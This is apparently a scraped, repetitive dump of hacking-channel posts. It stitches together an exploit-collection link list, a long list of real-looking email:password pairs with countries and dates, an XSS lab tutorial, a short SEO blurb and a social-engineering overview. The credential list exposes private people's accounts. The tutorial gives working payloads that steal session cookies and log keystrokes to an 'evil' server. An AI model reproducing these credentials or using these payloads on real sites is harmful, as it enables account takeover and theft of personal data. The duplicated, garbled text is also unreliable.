โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBig Collections Of Exploite Python & Bash include bug bounty :
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
>Updated 2019
https://github.com/1N3/Exploits
๐ฆInclude :
> Vulnserver.exe GMON SEH Overflow Exploit
> FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
> CoolPlayer+ Portable 2.19.6 Stack Overflow (ASLR Bypass)
> HTTPoxy Exploit/PoC Scanner
> Ability FTP 2.34 Buffer Overflow Exploit
> Aruba AP-205 Buffer Overflow Denial of Service PoC
> Brainpan1 CTF Buffer Overflow Exploit
> CesarFTP 0.99g Buffer Overflow Exploit
> Apache 2.2.x Range Header Denial of Service Exploit
> GHOST Glibc Gethostbyname Buffer Overflow Exploit
> PHP Serialization Injection Remote Code Execution Exploit
> CrikeyConCTF Koala Gallery Exploit
> Webmin 1.920 Unauthenticated RCE Metasploit Exploit
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBig Collections Of Exploite Python & Bash include bug bounty :
t.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
>Updated 2019
https://github.com/1N3/Exploits
๐ฆInclude :
> Vulnserver.exe GMON SEH Overflow Exploit
> FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)
> CoolPlayer+ Portable 2.19.6 Stack Overflow (ASLR Bypass)
> HTTPoxy Exploit/PoC Scanner
> Ability FTP 2.34 Buffer Overflow Exploit
> Aruba AP-205 Buffer Overflow Denial of Service PoC
> Brainpan1 CTF Buffer Overflow Exploit
> CesarFTP 0.99g Buffer Overflow Exploit
> Apache 2.2.x Range Header Denial of Service Exploit
> GHOST Glibc Gethostbyname Buffer Overflow Exploit
> PHP Serialization Injection Remote Code Execution Exploit
> CrikeyConCTF Koala Gallery Exploit
> Webmin 1.920 Unauthenticated RCE Metasploit Exploit
E N J O Y
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
nefritz1919@gmail.com:hockey19 | US | 13/01/2020
jeff@leedesignsllc.com:Whitey64 | US | 25/01/2020
bizzyboneternal@yahoo.com:7thsigns | US | 07/01/2020
ecxset@gmail.com:Setsuna13 | US | 18/03/2020
chillyoinc@hotmail.com:Production1 | CA | 04/01/2020
slavatyn@gmail.com:Uvn007007 | LV | 20/03/2020
chris8andahalf@hotmail.com:briana421 | US | 30/01/2020
Kellybeck100@gmail.com:Ebonie2005 | GB | 05/01/2020
itsalwaysmoody@gmail.com:f0stero03 | US | 10/01/2020
farrel.benton@gmail.com:xsw21qaz | US | 14/03/2020
heatherwhitcraft@yahoo.com:mama7mia | US | 20/01/2020
yuval123g@gmail.com:y070798y | IL | 08/01/2020
tlkeltner@yahoo.com:Sweetpete09 | US | 15/01/2020
zicc1@bigpond.com:Summer76 | AU | 22/01/2020
louise_birch4@hotmail.com:Louise0501 | DK | 13/01/2020
wendland010174@aol.com:wendy74 | DE | 08/02/2020
rockyjspencer@yahoo.com:yellowhair | US | 04/01/2020
jadetomlinson187@hotmail.co.uk:W1056187 | GB
rhys.piper@hotmail.com:Maga2010 | GB | 21/01/2020
ayottepatrick@hotmail.com:Ninpat64 | CA | 30/01/2020
naomi.a_05@hotmail.co.uk:Pondkite1 | GB | 13/01/2020
ruthiejewell@hotmail.com:Jewell11 | US | 17/01/2020
susan_mccabe@hotmail.com:T4mm7h00p5 | GB | 30/01/2020
j-didier@hotmail.com:Jessmaedid5 | CA | 02/02/2020
dou_power@hotmail.com:Upendi14 | CA | 28/01/2020
pvanderwalle@hotmail.com:Benson1953 | US | 09/01/2020
reneejustice@live.com.au:Ally1979 | AU | 10/01/2020
noelsuza@hotmail.com:Malcolm1 | US | 10/01/2020
JOANNACGORDON@HOTMAIL.COM:Michael123 | GB | 30/01/2020
kathleen_mburns@hotmail.com:Chapstick99 | US | 28/01/2020
sophie_elizabeth_ann@hotmail.com:Ijlmm667 | GB | 07/01/2020
amyb25@msn.com:Xander18 | US | 15/01/2020
royaltyatitsbest@yahoo.com:Chocolate22 | US | 10/01/2020
arch.donnarabe@gmail.com:_messiah07_ | PH | 02/02/2020
rshaeeda@yahoo.com:Asontai04 | US
mrush0513@gmail.com:sephora1 | US | 16/01/2020
cheryldixon144@hotmail.com:Hollieann1 | GB | 06/01/2020
texas.made.2009@gmail.com:Pepper09 | US | 26/02/2020
rocivaz@gmail.com:37942006 | ES | 27/01/2020
z.schlichter@gmail.com:wissota1 | US
stevenarodas@gmail.com:1Taukappa | US | 31/01/2020
missykrissy66@gmail.com:ing3ni0us | US | 01/02/2020
talk2me9ad2@hotmail.com:Jonathon1 | US
ryan.mcguire@baruchmail.cuny.edu:033188 | US | 23/01/2020
carastan0827@gmail.com:Flower77 | US | 13/01/2020
reneemaxwell@icloud.com:KickLow420 | US | 13/01/2020
cassieblue@live.co.uk:belgrave14 | GB
caroline_griz@hotmail.com:Pink0909 | GB | 12/01/2020
barb.mil@bigpond.net.au:Passw0rd | AU | 12/01/2020
prd74@live.com:Esteban1011974 | GB | 24/01/2020
ally-82@live.com.au:Amy19ally23 | AU | 16/01/2020
clintwalker@dslextreme.com:Monster24 | US | 08/01/2020
chelsealund86@hotmail.com:Henrietta1 | GB | 31/01/2020
tracie@idahokravmaga.com:1234ndcq | US | 11/01/2020
keryndavidson@hotmail.com:Davids0n | GB | 26/01/2020
weaslyisking@gmail.com:tiger38grey | US
kam96vt@gmail.com:5anibelI | US | 06/01/2020
fiona.wallace@live.com.au:Samuel71 | AU | 05/01/2020
seanandrewwilson@gmail.com:matiesse1 | AU | 24/01/2020
bethan113@hotmail.com:Chris1988 | GB | 26/01/2020
zoe.brew@mail.com:Socrates1 | GB
chmkstaff@yahoo.com:1fatkitty | US | 05/01/2020
doublejoe2002@gmail.com:Joethegamer | US | 29/02/2020
lcreddevils1@gmail.com:Govols93 | US | 17/01/2020
Tess_Leary@hotmail.co.uk:90210Shoes | AU | 11/01/2020
keviscool0110@hotmail.com:idontknow11 | US | 26/01/2020
laura-downie@hotmail.co.uk:Robmaya2697 | GB | 09/01/2020
rebeccabarcas@hotmail.co.uk:Smudger14 | GB | 24/01/2020
chippythesquirrel.weeter155@gmail.com:chippy101 | US | 25/01/2020
torytalk@hotmail.com:Banana1984 | GB | 22/01/2020
dmoor71@gmail.com:showboat | US | 18/01/2020
shanepockrus@yahoo.com:1234QWERasdf | US | 23/01/2020
fallowsmark@hotmail.com:Jameson11 | GB | 12/01/2020
theo638@gmail.com:papillon789 | FR | 29/01/2020
s.welton@hotmail.co.uk:Rebekah5 | GB | 24/03/2020
jpcrussell13@gmail.com:19Theronks | IE
naptownq70@gmail.com:football70 | US | 29/01/2020
ocaranza@gmail.com:chupalo1 | CL | 20/01/2020
fashiondiva16@gmail.com:Princess1996 | US | 11/03/2020
lisasosey@gmail.com:2boysmom | US | 01/02/2020
clara.casey96@hotmail.co.uk:Kittens96 | GB | 17/01/2020
jeff@leedesignsllc.com:Whitey64 | US | 25/01/2020
bizzyboneternal@yahoo.com:7thsigns | US | 07/01/2020
ecxset@gmail.com:Setsuna13 | US | 18/03/2020
chillyoinc@hotmail.com:Production1 | CA | 04/01/2020
slavatyn@gmail.com:Uvn007007 | LV | 20/03/2020
chris8andahalf@hotmail.com:briana421 | US | 30/01/2020
Kellybeck100@gmail.com:Ebonie2005 | GB | 05/01/2020
itsalwaysmoody@gmail.com:f0stero03 | US | 10/01/2020
farrel.benton@gmail.com:xsw21qaz | US | 14/03/2020
heatherwhitcraft@yahoo.com:mama7mia | US | 20/01/2020
yuval123g@gmail.com:y070798y | IL | 08/01/2020
tlkeltner@yahoo.com:Sweetpete09 | US | 15/01/2020
zicc1@bigpond.com:Summer76 | AU | 22/01/2020
louise_birch4@hotmail.com:Louise0501 | DK | 13/01/2020
wendland010174@aol.com:wendy74 | DE | 08/02/2020
rockyjspencer@yahoo.com:yellowhair | US | 04/01/2020
jadetomlinson187@hotmail.co.uk:W1056187 | GB
rhys.piper@hotmail.com:Maga2010 | GB | 21/01/2020
ayottepatrick@hotmail.com:Ninpat64 | CA | 30/01/2020
naomi.a_05@hotmail.co.uk:Pondkite1 | GB | 13/01/2020
ruthiejewell@hotmail.com:Jewell11 | US | 17/01/2020
susan_mccabe@hotmail.com:T4mm7h00p5 | GB | 30/01/2020
j-didier@hotmail.com:Jessmaedid5 | CA | 02/02/2020
dou_power@hotmail.com:Upendi14 | CA | 28/01/2020
pvanderwalle@hotmail.com:Benson1953 | US | 09/01/2020
reneejustice@live.com.au:Ally1979 | AU | 10/01/2020
noelsuza@hotmail.com:Malcolm1 | US | 10/01/2020
JOANNACGORDON@HOTMAIL.COM:Michael123 | GB | 30/01/2020
kathleen_mburns@hotmail.com:Chapstick99 | US | 28/01/2020
sophie_elizabeth_ann@hotmail.com:Ijlmm667 | GB | 07/01/2020
amyb25@msn.com:Xander18 | US | 15/01/2020
royaltyatitsbest@yahoo.com:Chocolate22 | US | 10/01/2020
arch.donnarabe@gmail.com:_messiah07_ | PH | 02/02/2020
rshaeeda@yahoo.com:Asontai04 | US
mrush0513@gmail.com:sephora1 | US | 16/01/2020
cheryldixon144@hotmail.com:Hollieann1 | GB | 06/01/2020
texas.made.2009@gmail.com:Pepper09 | US | 26/02/2020
rocivaz@gmail.com:37942006 | ES | 27/01/2020
z.schlichter@gmail.com:wissota1 | US
stevenarodas@gmail.com:1Taukappa | US | 31/01/2020
missykrissy66@gmail.com:ing3ni0us | US | 01/02/2020
talk2me9ad2@hotmail.com:Jonathon1 | US
ryan.mcguire@baruchmail.cuny.edu:033188 | US | 23/01/2020
carastan0827@gmail.com:Flower77 | US | 13/01/2020
reneemaxwell@icloud.com:KickLow420 | US | 13/01/2020
cassieblue@live.co.uk:belgrave14 | GB
caroline_griz@hotmail.com:Pink0909 | GB | 12/01/2020
barb.mil@bigpond.net.au:Passw0rd | AU | 12/01/2020
prd74@live.com:Esteban1011974 | GB | 24/01/2020
ally-82@live.com.au:Amy19ally23 | AU | 16/01/2020
clintwalker@dslextreme.com:Monster24 | US | 08/01/2020
chelsealund86@hotmail.com:Henrietta1 | GB | 31/01/2020
tracie@idahokravmaga.com:1234ndcq | US | 11/01/2020
keryndavidson@hotmail.com:Davids0n | GB | 26/01/2020
weaslyisking@gmail.com:tiger38grey | US
kam96vt@gmail.com:5anibelI | US | 06/01/2020
fiona.wallace@live.com.au:Samuel71 | AU | 05/01/2020
seanandrewwilson@gmail.com:matiesse1 | AU | 24/01/2020
bethan113@hotmail.com:Chris1988 | GB | 26/01/2020
zoe.brew@mail.com:Socrates1 | GB
chmkstaff@yahoo.com:1fatkitty | US | 05/01/2020
doublejoe2002@gmail.com:Joethegamer | US | 29/02/2020
lcreddevils1@gmail.com:Govols93 | US | 17/01/2020
Tess_Leary@hotmail.co.uk:90210Shoes | AU | 11/01/2020
keviscool0110@hotmail.com:idontknow11 | US | 26/01/2020
laura-downie@hotmail.co.uk:Robmaya2697 | GB | 09/01/2020
rebeccabarcas@hotmail.co.uk:Smudger14 | GB | 24/01/2020
chippythesquirrel.weeter155@gmail.com:chippy101 | US | 25/01/2020
torytalk@hotmail.com:Banana1984 | GB | 22/01/2020
dmoor71@gmail.com:showboat | US | 18/01/2020
shanepockrus@yahoo.com:1234QWERasdf | US | 23/01/2020
fallowsmark@hotmail.com:Jameson11 | GB | 12/01/2020
theo638@gmail.com:papillon789 | FR | 29/01/2020
s.welton@hotmail.co.uk:Rebekah5 | GB | 24/03/2020
jpcrussell13@gmail.com:19Theronks | IE
naptownq70@gmail.com:football70 | US | 29/01/2020
ocaranza@gmail.com:chupalo1 | CL | 20/01/2020
fashiondiva16@gmail.com:Princess1996 | US | 11/03/2020
lisasosey@gmail.com:2boysmom | US | 01/02/2020
clara.casey96@hotmail.co.uk:Kittens96 | GB | 17/01/2020
kathrynlouiseneild@hotmail.com:Lateshop1 | GB | 03/01/2020
smeek100@hotmail.com:Samboss1 | GB | 25/01/2020
vicky_l_859@hotmail.com:Swaykano2006 | GB | 13/01/2020
larad123@hotmail.com:Theresa123 | GB
sofyjean@hotmail.com:Millie9493 | AU | 27/01/2020
unclined@gmail.com:soundead1 | US | 27/01/2020
charlotte2walkies@yahoo.co.uk:Leojoe85 | GB | 17/01/2020
wadebm25@att.net:Coolstuff1 | US | 14/01/2020
taracutler@gmail.com:blueb3028 | US | 22/01/2020
souadhaddouch@hotmail.com:Younes76 | GB
bheeren2000@yahoo.com:doni1995 | US
ellenfreitag@hotmail.com:Sally2004 | AU | 29/01/2020
drektegek@hotmail.com:Bikkel01 | NL
kate_basset@hotmail.com:Malinda503 | AU | 01/02/2020
cstill20@hotmail.co.uk:Freya314 | GB
mufckeane@googlemail.com:Sophie12 | GB
adesersa@gmail.com:July292011 | US | 17/03/2020
bwneyes@hotmail.com:Mi2kings | US | 02/02/2020
sarahhillstead@hotmail.co.uk:Priday1898 | NL | 03/01/2020
lanhuashu1919@hotmail.com:lanhuashu1125109 | US | 18/01/2020
dani9000@yahoo.com:jackrabbit24 | US | 05/01/2020
kevin.hansen@gmx.de:wow3489032 | DE | 24/02/2020
kirstenquirke@live.co.uk:Redflower1 | IE | 25/01/2020
nicholascoons94@gmail.com:Godofwar27 | US | 15/01/2020
waters.bd@gmail.com:Fruity11 | VN
duggie12@live.com:zagreb12 | GB
mcnuggets719@gmail.com:Dooley5066 | US
tomkins.tina@googlemail.com:Cha1rlie | GB | 13/01/2020
pamela.lawson1983@hotmail.co.uk:cuthill1 | GB
ppepsi925@outlook.com:tinker9bell | US | 26/01/2020
Fabianviel@hotmail.com:Spookhuis1 | NL
lucie_hopkins@hotmail.com:pepsi123 | GB
demarcospizza1@yahoo.com:Pizza2005 | US | 18/01/2020
talia.ziskroit@gmail.com:taliaz | US
lucyg90@hotmail.com:Patsyg90 | AU | 20/01/2020
kennypulliam@gmail.com:virgil89 | US | 04/01/2020
olivia52@sky.com:Gymnastics13 | GB | 12/01/2020
clarkity@comcast.net:Mcm11395 | US | 19/01/2020
kelleykilmer@gmail.com:Momrocks | US | 13/01/2020
sue_shirley@hotmail.co.uk:suzanne25 | GB | 14/01/2020
sshephardmca@gmail.com:Bear2013 | US | 16/01/2020
chrystianrk@gmail.com:pookie03 | US | 23/01/2020
louise.lyons@hotmail.com.au:Cnfnvyq4 | GB | 09/01/2020
paulineriddeal@googlemail.com:Sunningdale1 | GB | 15/01/2020
justinplatten4@live.com.au:Legend69 | AU | 12/01/2020
matthew.d.haines@gmail.com:daysaway1 | US | 24/01/2020
scottymctoddy@gmail.com:repower1 | US | 21/01/2020
xplubaluba@gmail.com:xp64929929luba | GB | 05/01/2020
anne.hatten@bigpond.com:11Mikayla11 | AU | 26/01/2020
doml_93@hotmail.co.uk:ballon12 | GB | 28/01/2020
frank.r.carillo@gmail.com:honeyluva | US | 24/01/2020
JonVollman40@Gmail.com:06272001 | US | 05/03/2020
x.daniellej.x@hotmail.co.uk:Corky101 | GB | 10/01/2020
deborahnakache@hotmail.fr:mazaltov1983 | FR
heatherwilkinson1@msn.com:Chocolate917 | CA | 24/01/2020
sharon_windeatt73@hotmail.com:Monte166 | GB
msescarcega@gmail.com:bonita911 | US | 30/01/2020
rfsundevil@hotmail.com:Rfitz6303 | US | 16/01/2020
greendragon_1986@hotmail.com:Tortoise816 | GB | 05/01/2020
dafna.revah@gmail.com:Israel1948 | US | 21/03/2020
joshsummers9@gmail.com:bubbler2 | US
alexgroombridge@hotmail.com:Alex1988 | AU | 02/04/2020
wsloan99@hotmail.com:budapest06 | US | 13/01/2020
laurajleach@hotmail.co.uk:Charlpike1 | GB | 04/01/2020
samanez.katia@gmail.com:marcelo11 | US
gill-calv@hotmail.com:buster123 | GB | 02/04/2020
ckfellman@gmail.com:fellman | US | 01/02/2020
dsmiles503@gmail.com:mrsjones1 | US | 15/01/2020
teags1987@hotmail.com:kahluaha87 | AU | 23/03/2020
caitlinmckeownkayoko@yahoo.com:@ir43ad!!! | US
clo2k1@hotmail.com:Laguna34 | GB | 17/01/2020
holly_mercieca@hotmail.co.uk:Pascoe01 | GB
scaudle@gmail.com:donkeypower | US | 09/01/2020
hjzweers@hotmail.com:Pa55word31 | NL | 08/01/2020
daniel.chilelli@hotmail.com:sausage1 | AU | 31/01/2020
lanhuashu1919@hotmail.com:lanhuashu1125109 | US | 18/01/2020
rich850210@freemail.hu:Znffgp007 | HU | 16/01/2020
roniekillian@gmail.com:hernandez12345 | IE | 21/01/2020
kaylaw@hotmail.co.nz:Fl0werb0mb | NZ
elbel02@yahoo.com:summer03 | US | 18/03/2020
smeek100@hotmail.com:Samboss1 | GB | 25/01/2020
vicky_l_859@hotmail.com:Swaykano2006 | GB | 13/01/2020
larad123@hotmail.com:Theresa123 | GB
sofyjean@hotmail.com:Millie9493 | AU | 27/01/2020
unclined@gmail.com:soundead1 | US | 27/01/2020
charlotte2walkies@yahoo.co.uk:Leojoe85 | GB | 17/01/2020
wadebm25@att.net:Coolstuff1 | US | 14/01/2020
taracutler@gmail.com:blueb3028 | US | 22/01/2020
souadhaddouch@hotmail.com:Younes76 | GB
bheeren2000@yahoo.com:doni1995 | US
ellenfreitag@hotmail.com:Sally2004 | AU | 29/01/2020
drektegek@hotmail.com:Bikkel01 | NL
kate_basset@hotmail.com:Malinda503 | AU | 01/02/2020
cstill20@hotmail.co.uk:Freya314 | GB
mufckeane@googlemail.com:Sophie12 | GB
adesersa@gmail.com:July292011 | US | 17/03/2020
bwneyes@hotmail.com:Mi2kings | US | 02/02/2020
sarahhillstead@hotmail.co.uk:Priday1898 | NL | 03/01/2020
lanhuashu1919@hotmail.com:lanhuashu1125109 | US | 18/01/2020
dani9000@yahoo.com:jackrabbit24 | US | 05/01/2020
kevin.hansen@gmx.de:wow3489032 | DE | 24/02/2020
kirstenquirke@live.co.uk:Redflower1 | IE | 25/01/2020
nicholascoons94@gmail.com:Godofwar27 | US | 15/01/2020
waters.bd@gmail.com:Fruity11 | VN
duggie12@live.com:zagreb12 | GB
mcnuggets719@gmail.com:Dooley5066 | US
tomkins.tina@googlemail.com:Cha1rlie | GB | 13/01/2020
pamela.lawson1983@hotmail.co.uk:cuthill1 | GB
ppepsi925@outlook.com:tinker9bell | US | 26/01/2020
Fabianviel@hotmail.com:Spookhuis1 | NL
lucie_hopkins@hotmail.com:pepsi123 | GB
demarcospizza1@yahoo.com:Pizza2005 | US | 18/01/2020
talia.ziskroit@gmail.com:taliaz | US
lucyg90@hotmail.com:Patsyg90 | AU | 20/01/2020
kennypulliam@gmail.com:virgil89 | US | 04/01/2020
olivia52@sky.com:Gymnastics13 | GB | 12/01/2020
clarkity@comcast.net:Mcm11395 | US | 19/01/2020
kelleykilmer@gmail.com:Momrocks | US | 13/01/2020
sue_shirley@hotmail.co.uk:suzanne25 | GB | 14/01/2020
sshephardmca@gmail.com:Bear2013 | US | 16/01/2020
chrystianrk@gmail.com:pookie03 | US | 23/01/2020
louise.lyons@hotmail.com.au:Cnfnvyq4 | GB | 09/01/2020
paulineriddeal@googlemail.com:Sunningdale1 | GB | 15/01/2020
justinplatten4@live.com.au:Legend69 | AU | 12/01/2020
matthew.d.haines@gmail.com:daysaway1 | US | 24/01/2020
scottymctoddy@gmail.com:repower1 | US | 21/01/2020
xplubaluba@gmail.com:xp64929929luba | GB | 05/01/2020
anne.hatten@bigpond.com:11Mikayla11 | AU | 26/01/2020
doml_93@hotmail.co.uk:ballon12 | GB | 28/01/2020
frank.r.carillo@gmail.com:honeyluva | US | 24/01/2020
JonVollman40@Gmail.com:06272001 | US | 05/03/2020
x.daniellej.x@hotmail.co.uk:Corky101 | GB | 10/01/2020
deborahnakache@hotmail.fr:mazaltov1983 | FR
heatherwilkinson1@msn.com:Chocolate917 | CA | 24/01/2020
sharon_windeatt73@hotmail.com:Monte166 | GB
msescarcega@gmail.com:bonita911 | US | 30/01/2020
rfsundevil@hotmail.com:Rfitz6303 | US | 16/01/2020
greendragon_1986@hotmail.com:Tortoise816 | GB | 05/01/2020
dafna.revah@gmail.com:Israel1948 | US | 21/03/2020
joshsummers9@gmail.com:bubbler2 | US
alexgroombridge@hotmail.com:Alex1988 | AU | 02/04/2020
wsloan99@hotmail.com:budapest06 | US | 13/01/2020
laurajleach@hotmail.co.uk:Charlpike1 | GB | 04/01/2020
samanez.katia@gmail.com:marcelo11 | US
gill-calv@hotmail.com:buster123 | GB | 02/04/2020
ckfellman@gmail.com:fellman | US | 01/02/2020
dsmiles503@gmail.com:mrsjones1 | US | 15/01/2020
teags1987@hotmail.com:kahluaha87 | AU | 23/03/2020
caitlinmckeownkayoko@yahoo.com:@ir43ad!!! | US
clo2k1@hotmail.com:Laguna34 | GB | 17/01/2020
holly_mercieca@hotmail.co.uk:Pascoe01 | GB
scaudle@gmail.com:donkeypower | US | 09/01/2020
hjzweers@hotmail.com:Pa55word31 | NL | 08/01/2020
daniel.chilelli@hotmail.com:sausage1 | AU | 31/01/2020
lanhuashu1919@hotmail.com:lanhuashu1125109 | US | 18/01/2020
rich850210@freemail.hu:Znffgp007 | HU | 16/01/2020
roniekillian@gmail.com:hernandez12345 | IE | 21/01/2020
kaylaw@hotmail.co.nz:Fl0werb0mb | NZ
elbel02@yahoo.com:summer03 | US | 18/03/2020
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆXSS vulnerabilities are generally used to steal sensitive information (login credentials, authentication tokens, personal user data) as well as perform actions on behalf of authenticated users.
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Note : For Windows users, open Git Bash. You will use this program to run all the "terminal" commands you see in the rest of this guide.
For Linux and Mac users, open Terminal.
In your terminal program, use git to download the project:
1) git clone https://github.com/Learn-by-doing/xss.git
If successful, a new folder named xss should have been created.
2) Change directory into the new folder:
> cd xss
3) Install the project's dependencies using npm:
> npm install
4) Now we can run the local web server using Node.js:
> node server.js
5) If successful, you should see the following message: Server listening at localhost:3000. This means that a local web server is now running and is listening for requests at localhost:3000.
6) Open your browser and click the link.
> You should see a simple search form. Enter some text then press enter (or click the "search" button).
7) Open the developer tools in your browser (F12) and open the "Console" sub-tab.
Copy/paste the following code into the console and run it:
encodeURIComponent('<img src="does-not-exist" onerror="alert(\'hi!\')">');
8) Copy the output and paste it into the address bar so that the URL looks like this:
http://localhost:3000/?q=%3Cimg%20src%3D%22does-not-exist%22%20onerror%3D%22alert('hi!')%22%3E
9) Exploitation
Open the "Application" sub-tab in your browser's developer tools. Under "Storage" -> "Cookies", click "localhost:3000" to show the cookies being saved by the browser for this website.
10) Notice how there is a cookie named "connect.sid". This is a session cookie set by our local web server. Is it possible for us to access this via the XSS vulnerability? Let's try. Repeat the steps from the "Proof of Concept" section above, but with the following code:
<img src="does-not-exist" onerror="alert(document.cookie)">
11) Encode the above HTML and use it as the search query, or try this link.
If successful, you should see the contents of the session cookie printed in an alert pop-up.
12) Now before continuing, we will need to start our "evil" web server. Run the following command in a second terminal window:
> node evil-server.js
13) And now try to use the following code with the XSS vulnerability to steal the session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?data=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
14) Encode the above HTML and use it as the search query, or try this link.
> Check the terminal window of the evil server. Do you see the contents of the session cookie?
15) So now the JavaScript code from the last example in a readable form:
var img = document.createElement('img');
img.src = 'http://localhost:3001/cookie?data=' + document.cookie;
document.querySelector('body').appendChild(img);
16) Now let's get even more nasty. Let's try a key-logger:
<img src="does-not-exist" onerror="var timeout; var buffer = \'\'; document.querySelector(\'body\').addEventListener(\'keypress\', function(event) { if (event.which !== 0) { clearTimeout(timeout); buffer += String.fromCharCode(event.which); timeout = setTimeout(function() { var xhr = new XMLHttpRequest(); var uri = \'http://localhost:3001/keys?data=\' + encodeURIComponent(buffer); xhr.open(\'GET\', uri); xhr.send(); buffer = \'\'; }, 400); } });">
17) Encode the above HTML and use it as the search query
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆXSS vulnerabilities are generally used to steal sensitive information (login credentials, authentication tokens, personal user data) as well as perform actions on behalf of authenticated users.
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
Note : For Windows users, open Git Bash. You will use this program to run all the "terminal" commands you see in the rest of this guide.
For Linux and Mac users, open Terminal.
In your terminal program, use git to download the project:
1) git clone https://github.com/Learn-by-doing/xss.git
If successful, a new folder named xss should have been created.
2) Change directory into the new folder:
> cd xss
3) Install the project's dependencies using npm:
> npm install
4) Now we can run the local web server using Node.js:
> node server.js
5) If successful, you should see the following message: Server listening at localhost:3000. This means that a local web server is now running and is listening for requests at localhost:3000.
6) Open your browser and click the link.
> You should see a simple search form. Enter some text then press enter (or click the "search" button).
7) Open the developer tools in your browser (F12) and open the "Console" sub-tab.
Copy/paste the following code into the console and run it:
encodeURIComponent('<img src="does-not-exist" onerror="alert(\'hi!\')">');
8) Copy the output and paste it into the address bar so that the URL looks like this:
http://localhost:3000/?q=%3Cimg%20src%3D%22does-not-exist%22%20onerror%3D%22alert('hi!')%22%3E
9) Exploitation
Open the "Application" sub-tab in your browser's developer tools. Under "Storage" -> "Cookies", click "localhost:3000" to show the cookies being saved by the browser for this website.
10) Notice how there is a cookie named "connect.sid". This is a session cookie set by our local web server. Is it possible for us to access this via the XSS vulnerability? Let's try. Repeat the steps from the "Proof of Concept" section above, but with the following code:
<img src="does-not-exist" onerror="alert(document.cookie)">
11) Encode the above HTML and use it as the search query, or try this link.
If successful, you should see the contents of the session cookie printed in an alert pop-up.
12) Now before continuing, we will need to start our "evil" web server. Run the following command in a second terminal window:
> node evil-server.js
13) And now try to use the following code with the XSS vulnerability to steal the session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?data=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
14) Encode the above HTML and use it as the search query, or try this link.
> Check the terminal window of the evil server. Do you see the contents of the session cookie?
15) So now the JavaScript code from the last example in a readable form:
var img = document.createElement('img');
img.src = 'http://localhost:3001/cookie?data=' + document.cookie;
document.querySelector('body').appendChild(img);
16) Now let's get even more nasty. Let's try a key-logger:
<img src="does-not-exist" onerror="var timeout; var buffer = \'\'; document.querySelector(\'body\').addEventListener(\'keypress\', function(event) { if (event.which !== 0) { clearTimeout(timeout); buffer += String.fromCharCode(event.which); timeout = setTimeout(function() { var xhr = new XMLHttpRequest(); var uri = \'http://localhost:3001/keys?data=\' + encodeURIComponent(buffer); xhr.open(\'GET\', uri); xhr.send(); buffer = \'\'; }, 400); } });">
17) Encode the above HTML and use it as the search query
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat About SEO ? GUIDE:
T.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
> The most famous phrase used in SEO is โIt Dependsโ. It all depends on the type of content, the CMS on which the site is built, the industry in which you are located, etc. But when it comes to SEO for healthcare organizations, โIt Dependsโ becomes โIt Matters.โ
For the most part, the most important driver in SEO is the target audience and its activity
Here are three things to consider when optimizing medical-related sites.
> Important SEO Considerations for Healthcare Sites
1) Mobile First Optimization Above All
2) Multilingualism
3) Optimization for local issuance
๐ฆwhat about clients:
> Connect your patients to your site
After all, delivering useful, strong content to users
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆWhat About SEO ? GUIDE:
T.me/UndercOdeTestingOfficial
๐ฆโโโฃโข โโฃโโกโฃ
> The most famous phrase used in SEO is โIt Dependsโ. It all depends on the type of content, the CMS on which the site is built, the industry in which you are located, etc. But when it comes to SEO for healthcare organizations, โIt Dependsโ becomes โIt Matters.โ
For the most part, the most important driver in SEO is the target audience and its activity
Here are three things to consider when optimizing medical-related sites.
> Important SEO Considerations for Healthcare Sites
1) Mobile First Optimization Above All
2) Multilingualism
3) Optimization for local issuance
๐ฆwhat about clients:
> Connect your patients to your site
After all, delivering useful, strong content to users
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSOCIAL ENGENEER ATTACKS
t.me/UndercOdeTestingOfficial
๐ฆWhat is Social Engineering? & what is the plan in use ?
> Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to a computer system.
> The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software.
> Knowing the tricks used by hackers to trick users into releasing vital login information among others is fundamental in protecting computer systems
๐ฆHOW THOSE ATTACKS WORKS ?
1) Gather Information: This is the first stage, the learns as much as he can about the intended victim. The information is gathered from company websites, other publications and sometimes by talking to the users of the target system.
2)Plan Attack: The attackers outline how he/she intends to execute the attack
3) Acquire Tools: These include computer programs that an attacker will use when launching the attack.
4) Attack: Exploit the weaknesses in the target system.
Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders, etc. is used in attacks such as password guessing.
Written by Undercode
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSOCIAL ENGENEER ATTACKS
t.me/UndercOdeTestingOfficial
๐ฆWhat is Social Engineering? & what is the plan in use ?
